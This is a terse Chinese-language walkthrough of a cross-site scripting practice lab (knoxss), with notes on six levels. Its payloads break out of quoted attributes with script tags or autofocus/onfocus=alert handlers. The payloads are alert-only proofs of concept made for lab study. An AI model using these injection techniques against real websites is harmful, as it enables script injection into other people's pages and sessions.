XSS靶场实战(工作wuwuwu)
knoxss
knoxss
Single Reflection Using QUERY of URL
——01
测试标签
<script>alert(666666)</script>
——02: "
<h1>test</h1>
没有反应,查看源码
现在需要闭合双引号,我计划还是先搞标签
"><h1>test</h1>
标签上:
"><script>alert(666666)</script>
——03: ’
<h1>test</h1>
闭合","被实体编码
'闭合
'>来闭合
'><h1>test</h1>
不多的时候:
标签上:
'><script>alert(666666)</script>
——04:" + input属性
<h1>test</h1>
"闭合
发现"闭合了,但是标签无法被闭合,只能看属性
找到 input 对应的xss属性
<input autofocus onfocus=alert(1)>
使用
"autofocus onfocus=alert(1) b="
刷新页面就触发!
——05: ’ + input
"闭合
‘闭合
闭合,但是 > 被实体编码
属性
' autofocus onfocus=alert(1) b="
'后面是否有空格 都行
——06
页面看不到
①源码搜索到:
再去前面找到对应的,未来edit as html
②直接搜索也可(ctrl + F)
<h1>test</h1>
"闭合
使用属性
" autofocus onfocus=alert(1) b="
自己赋值了